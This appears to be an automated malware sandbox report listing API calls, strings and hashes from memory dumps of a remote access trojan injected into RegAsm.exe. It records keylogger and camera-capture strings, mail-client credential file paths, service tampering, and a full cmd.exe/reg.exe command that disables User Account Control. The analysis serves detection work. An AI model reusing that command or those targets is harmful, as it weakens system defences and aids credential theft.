                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-OT0ZCG$`.S
                            • API String ID: 0-3949712931
                            • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                            • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                            • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                            • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                            APIs
                            • _free.LIBCMT ref: 1000536F
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 10005381
                            • _free.LIBCMT ref: 10005394
                            • _free.LIBCMT ref: 100053A5
                            • _free.LIBCMT ref: 100053B6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID: xV
                            • API String ID: 776569668-2633863268
                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                            APIs
                            • __allrem.LIBCMT ref: 0043ACE9
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                            • __allrem.LIBCMT ref: 0043AD1C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                            • __allrem.LIBCMT ref: 0043AD51
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                            • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                            • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                            • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                            APIs
                            • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                            • API String ID: 3469354165-3054508432
                            • Opcode ID: 5b86701f5adbcf5e18b351e7d473d9c1822f7a9639d77f2baef9ce5fe532cdad
                            • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                            • Opcode Fuzzy Hash: 5b86701f5adbcf5e18b351e7d473d9c1822f7a9639d77f2baef9ce5fe532cdad
                            • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                            • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                            • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                            • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                            APIs
                            • _strlen.LIBCMT ref: 10001607
                            • _strcat.LIBCMT ref: 1000161D
                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                            • lstrcatW.KERNEL32(?,?), ref: 1000165A
                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                            • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrcatlstrlen$_strcat_strlen
                            • String ID:
                            • API String ID: 1922816806-0
                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                            APIs
                            • lstrcatW.KERNEL32(?,?), ref: 10001038
                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$AttributesFilelstrcat
                            • String ID:
                            • API String ID: 3594823470-0
                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                            • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                            • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                            • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                            APIs
                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                            APIs
                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • _free.LIBCMT ref: 10005B2D
                            • _free.LIBCMT ref: 10005B55
                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • _abort.LIBCMT ref: 10005B74
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                            APIs
                            • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • _free.LIBCMT ref: 004482CC
                            • _free.LIBCMT ref: 004482F4
                            • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • _abort.LIBCMT ref: 00448313
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                            • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                            • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                            • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                            • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                            • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                            • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                            • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                            • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                            • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                            • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                            • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                            • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                            APIs
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                            • API String ID: 4036392271-1520055953
                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                            • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                            • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                            • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: X8S
                            • API String ID: 0-2014517935
                            • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                            • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                            • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                            • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                            • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                            • CloseHandle.KERNEL32(00000000), ref: 0040A729
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: XQG
                            • API String ID: 1958988193-3606453820
                            • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                            • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                            • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                            • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                            • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                            • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                            • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                            • CloseHandle.KERNEL32(?), ref: 004077E5
                            • CloseHandle.KERNEL32(?), ref: 004077EA
                            Strings
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                            • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                            • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                            • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                            • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                            Strings
                            Memory Dump Source
